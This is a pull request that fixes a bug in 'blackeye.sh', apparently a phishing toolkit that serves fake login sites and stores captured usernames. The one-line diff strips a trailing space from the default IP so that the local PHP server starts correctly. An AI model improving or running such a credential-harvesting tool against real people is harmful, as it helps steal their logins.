### PR TITLE
Resolved #14

### DIFF
--- a/blackeye.sh
+++ b/blackeye.sh
@@ -377,6 +377,7 @@ rm -rf sites/$server/usernames.txt
 fi
 
 default_ip=$(hostname -I)
+default_ip=${default_ip%?}
 printf "\e[1;92m[\e[0m*\e[1;92m] Put your local IP (Default %s): " $default_ip
 read ip
 ip="${ip:-${default_ip}}"


### PR DESCRIPTION
The string containing the default ip adress has a space as a last character resulting the parameter -S of the php command in line 385 :
sudo php -t "sites/$server" -S "$ip:80" > /dev/null 2>&1 &  
to be for example "192.168.0.1 :80" instead of the intended value "192.168.0.1:80"